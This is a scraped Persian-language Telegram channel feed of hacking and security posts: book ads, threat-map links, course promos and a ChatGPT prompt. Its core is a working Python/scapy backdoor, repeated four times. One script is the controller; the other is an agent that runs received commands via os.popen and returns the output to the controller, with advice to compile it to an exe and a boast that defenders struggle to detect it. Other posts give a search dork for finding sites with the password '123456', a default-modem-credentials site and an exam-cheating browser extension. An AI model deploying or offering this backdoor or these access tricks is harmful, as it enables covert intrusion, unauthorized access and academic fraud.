My folder vip
76 subscribers
202 photos
82 videos
622 files
499 links
آرشیو یادگیری هک/امنیت

اینجا فولدر شخصی من برای یادگیری و ثبت مطالب Linux، Networking و Cyber Security است.

🔐 LPIC | Network+ | CEH | SANS
🐧 Linux & System Administration
🌐 Networking & Troubleshooting
💻 Python & Security Tools
🧪 Labs | CTF | Prac
Download Telegram
📚 کتاب کاربردی #Windows #Security Internals
✨✨✨ 💫💫💫
کتاب تخصصی #امنیت #SOC . فقط چند جلد بنا به درخواست برخی کاربران چاپ جدید شده است 🙈
" مرکز عملیات امنیت SOC"
مولفین : مهندس روح اله آب نیکی , مهندسین عاطفه و عطیه ثابتی خواه ماسوله
قیمت : 500,000 تومان ( در سال 1403 افزایش حداقل 20% قیمت خواهیم داشت)
تعداد صفحات : 694 صفحه
چاپ جدید : اسفند 1402
ارسال پستی : فقط تا تاریخ 20 اسفند 1402
جهت هماهنگی و درخواست کتاب در تلگرام
۰۹۳۸۸۶۸۲۳۰۸ پیام بدید.
فهرست و نمونه ی از کتاب 👇👇👇
📚 کتاب مبانی سیسکو #MeraKi
پیکربندی تجهیزات مبتنی بر کلآد سیسکو . چاپ 2024 #Cisco
Exploring_Real_world_Value_of_OSINT.pdf
53.1 MB
📚معرفی کتاب برای علاقه مندان "غواصی عمیق: تحقیق در ارزش دنیای واقعی اوسینت" 2023"
🆔
@tiivik
⭕️چگونه وب سایتی با رمز عبور ضعیف پیدا کنیم؟
در ZoomEye از این عبارت استفاده می کنیم:

"type=\"password\" value=\"123456\""

🆔@tiivik
⭕️مجموعه ای از سامانه ها برای نظارت بر تهدیدات سایبری

📌مشاهده تغییرات در حال وقوع در مقیاس کشورها و قاره ها منبع واقعی برای تحلیلگران اوسینت است.

1.
ShadowServer — اطلاعات مربوط به انواع تهدیدها، مانند حملات DDoS، بات نت ها، اسکن پورت و شناسایی آسیب پذیری های CVE را جمع آوری می کند. نقشه ها و نمودارها آمار به روز رسانی روزانه را ارائه می دهند.
2.
Live Threat Map — در اینجا می توانید آمار خلاصه حملات سایبری در ساعت، روز یا ماه گذشته را مشاهده کنید و همچنین کشورهای مورد حمله، بردارهای حمله برتر و پورت های اسکن شده را برجسته کنید.
3.
exposure.shodan — سیستم‌های کنترل فرآیند خودکار، پورت‌های باز خارج از پایه، به تفکیک منطقه.
4.
ddos-attack-map — با جدول زمانی، فیلترها بر اساس کشور و صنعت، و همچنین نشان دهنده قدرت حملات
5.
Cyber Attack Map — سرورهای نقشه برتر که هرزنامه و بدافزار را توزیع می کنند.
🆔
@tiivik
#معرفی_سایت

سایتی مناسب برای پیدا کردن یوزر و پسورد پیشفرض مودم ها
اجرای ریموت کد با استفاده از پروتکل FTP:

کدی که باید روی سیستم خودتون(C2) بذارید:
import os
from scapy.all import *

def ctwo():
while True:
command = input('# Enter command: ')
ftp_pkt = IP(dst="192.168.70.137") / TCP(dport=21) / command
send(ftp_pkt, iface="ens34")
rx = sniff(filter="tcp and port 21", count=1, timeout=10, iface="ens34")

if rx:
print(rx[0][Raw].load.decode('utf-8'))
else:
print("No response received within the timeout period.")

ctwo()


کدی که میشه Agent شما:
import os
from scapy.all import *

def agent():
while True:
ftp_pkt = sniff(filter="tcp and port 21", count=1)


var = ftp_pkt[0][Raw].load.decode('utf-8')

res = os.popen(var).read()


send(IP(dst="192.168.70.136") / TCP(dport=21) / res)

agent()


دقت کنین که IP ها و نام Intrface شبکه رو براساس سیستم خودتون تغییر بدید.
برای فایل دوم هم میتونید به راحتی کدهای پایتون بالارو تبدیل به exe کنید و تمام :)

شاید اینا روی هم 50 خط هم نشه، ولی شناساییش توی واحد های دفاعی یه مقدار سخته، درصورتی که کامند های طولانی و فعالیت خیلی حجیم باهاش انجام ندید. توی شرایطی با استفاده از لاگ های زیک میشه شناسایی کرد این حملات رو که بعدا اینارو بررسی میکنیم. سوالی بود دایرکت اینستاگرام در خدمتتونم.



پستش:
https://www.instagram.com/reel/C3scTqWCY5D/?igsh=ZDE1MWVjZGVmZQ==
اجرای ریموت کد با استفاده از پروتکل FTP:

کدی که باید روی سیستم خودتون(C2) بذارید:
import os
from scapy.all import *

def ctwo():
while True:
command = input('# Enter command: ')
ftp_pkt = IP(dst="192.168.70.137") / TCP(dport=21) / command
send(ftp_pkt, iface="ens34")
rx = sniff(filter="tcp and port 21", count=1, timeout=10, iface="ens34")

if rx:
print(rx[0][Raw].load.decode('utf-8'))
else:
print("No response received within the timeout period.")

ctwo()


کدی که میشه Agent شما:
import os
from scapy.all import *

def agent():
while True:
ftp_pkt = sniff(filter="tcp and port 21", count=1)


var = ftp_pkt[0][Raw].load.decode('utf-8')

res = os.popen(var).read()


send(IP(dst="192.168.70.136") / TCP(dport=21) / res)

agent()


دقت کنین که IP ها و نام Intrface شبکه رو براساس سیستم خودتون تغییر بدید.
برای فایل دوم هم میتونید به راحتی کدهای پایتون بالارو تبدیل به exe کنید و تمام :)

شاید اینا روی هم 50 خط هم نشه، ولی شناساییش توی واحد های دفاعی یه مقدار سخته، درصورتی که کامند های طولانی و فعالیت خیلی حجیم باهاش انجام ندید. توی شرایطی با استفاده از لاگ های زیک میشه شناسایی کرد این حملات رو که بعدا اینارو بررسی میکنیم. سوالی بود دایرکت اینستاگرام در خدمتتونم.



پستش:
https://www.instagram.com/reel/C3scTqWCY5D/?igsh=ZDE1MWVjZGVmZQ==
اجرای ریموت کد با استفاده از پروتکل FTP:

کدی که باید روی سیستم خودتون(C2) بذارید:
import os
from scapy.all import *

def ctwo():
while True:
command = input('# Enter command: ')
ftp_pkt = IP(dst="192.168.70.137") / TCP(dport=21) / command
send(ftp_pkt, iface="ens34")
rx = sniff(filter="tcp and port 21", count=1, timeout=10, iface="ens34")

if rx:
print(rx[0][Raw].load.decode('utf-8'))
else:
print("No response received within the timeout period.")

ctwo()


کدی که میشه Agent شما:
import os
from scapy.all import *

def agent():
while True:
ftp_pkt = sniff(filter="tcp and port 21", count=1)


var = ftp_pkt[0][Raw].load.decode('utf-8')

res = os.popen(var).read()


send(IP(dst="192.168.70.136") / TCP(dport=21) / res)

agent()


دقت کنین که IP ها و نام Intrface شبکه رو براساس سیستم خودتون تغییر بدید.
برای فایل دوم هم میتونید به راحتی کدهای پایتون بالارو تبدیل به exe کنید و تمام :)

شاید اینا روی هم 50 خط هم نشه، ولی شناساییش توی واحد های دفاعی یه مقدار سخته، درصورتی که کامند های طولانی و فعالیت خیلی حجیم باهاش انجام ندید. توی شرایطی با استفاده از لاگ های زیک میشه شناسایی کرد این حملات رو که بعدا اینارو بررسی میکنیم. سوالی بود دایرکت اینستاگرام در خدمتتونم.



پستش:
https://www.instagram.com/reel/C3scTqWCY5D/?igsh=ZDE1MWVjZGVmZQ==
اجرای ریموت کد با استفاده از پروتکل FTP:

کدی که باید روی سیستم خودتون(C2) بذارید:
import os
from scapy.all import *

def ctwo():
while True:
command = input('# Enter command: ')
ftp_pkt = IP(dst="192.168.70.137") / TCP(dport=21) / command
send(ftp_pkt, iface="ens34")
rx = sniff(filter="tcp and port 21", count=1, timeout=10, iface="ens34")

if rx:
print(rx[0][Raw].load.decode('utf-8'))
else:
print("No response received within the timeout period.")

ctwo()


کدی که میشه Agent شما:
import os
from scapy.all import *

def agent():
while True:
ftp_pkt = sniff(filter="tcp and port 21", count=1)


var = ftp_pkt[0][Raw].load.decode('utf-8')

res = os.popen(var).read()


send(IP(dst="192.168.70.136") / TCP(dport=21) / res)

agent()


دقت کنین که IP ها و نام Intrface شبکه رو براساس سیستم خودتون تغییر بدید.
برای فایل دوم هم میتونید به راحتی کدهای پایتون بالارو تبدیل به exe کنید و تمام :)

شاید اینا روی هم 50 خط هم نشه، ولی شناساییش توی واحد های دفاعی یه مقدار سخته، درصورتی که کامند های طولانی و فعالیت خیلی حجیم باهاش انجام ندید. توی شرایطی با استفاده از لاگ های زیک میشه شناسایی کرد این حملات رو که بعدا اینارو بررسی میکنیم. سوالی بود دایرکت اینستاگرام در خدمتتونم.



پستش:
https://www.instagram.com/reel/C3scTqWCY5D/?igsh=ZDE1MWVjZGVmZQ==
Media is too big
VIEW IN TELEGRAM
#هک_با_جادی ۰۰۱
داشتم یکسری پازل مرتبط با هک حل می کردم که دیدم چرا ازش یه دوره درست نکنم (:‌ از اون دوره‌های آزاد باز است که با هم توش پیش میریم و فعلا هم اسمش شده #هک با جادی. قسمت اول معرفی بازی‌ای که می کنیم و نشون دادن اینکه چی رو باید تمرین کنین و نصب کالی لینوکس.
لینک یوتیوب
https://youtu.be/kO1rE2miA8I

@jadi_fans
🧠 تبدیل ChatGPT به ترمینال لینوکس

▪️با این #پرامت چت جی پی تی تبدیل به ترمینال لینوکس میشه مانند عکس ، شما میتونید کاملا محیط لینوکس با چت جی پی تی تجربه کنید اگه میخواستید کاری انجام بدید ولی دستورش رو نمیدونستید چیزی که میخواید رو داخل دوتا اکولاد {} قرار بدید مثل عکس و اون کار رو براتون انجام میده.

I want you to act as a linux terminal. I will type commands and you will reply with what the terminal should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. do not write explanations. do not type commands unless I instruct you to do so. when i need to tell you something in english, i will do so by putting text inside curly brackets {like this}. my first command is pwd

@RoidBest
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 این اکستنشن گوگل کروم به شما امکان می دهد در هر صفحه ای در مرورگر خود با ChatGPT تماس بگیرید.

می توانید بی سر و صدا در آزمون های آنلاین تقلب کنید. همانطور که در ویدیو می بینید. 🥶
📥 دانلود اکستنشن GPT GO

🚀 @AlefbeMedia
HTTP The Definitive Guide.pdf
6.6 MB
HTTP The Definitive Guide
کتاب خوب در مورد HTTP
@SecCode
This media is not supported in your browser
VIEW IN TELEGRAM
یک تارگت خوب با نکات عالی که آسیب پذیری های مختلفی دارد که بصورت Black Box Penetration Testing در دوره جامع تست نفوذ وب آموزش داده میشود و تمامی آسیب پذیری های آن بصورت کامل تشریح میشود
شما هم میتوانید روی این تارگت کار کنید
https://live.grupochat.co
شما هم میتوانید در دوره جدید جامع تست نفوذ وب ثبت نام کنید
@SecCode
This media is not supported in your browser
VIEW IN TELEGRAM
گزارش باگ Remote Command Execution از یک وب سایت ایرانی !
پیدا کردن باگ های RCE خیلی سخت است بعضی مواقع ممکن است جلوی چشم ما باشد ولی ما آن را نبینیم .
@dorsateam
Media is too big
VIEW IN TELEGRAM
OWASP Security Misconfiguration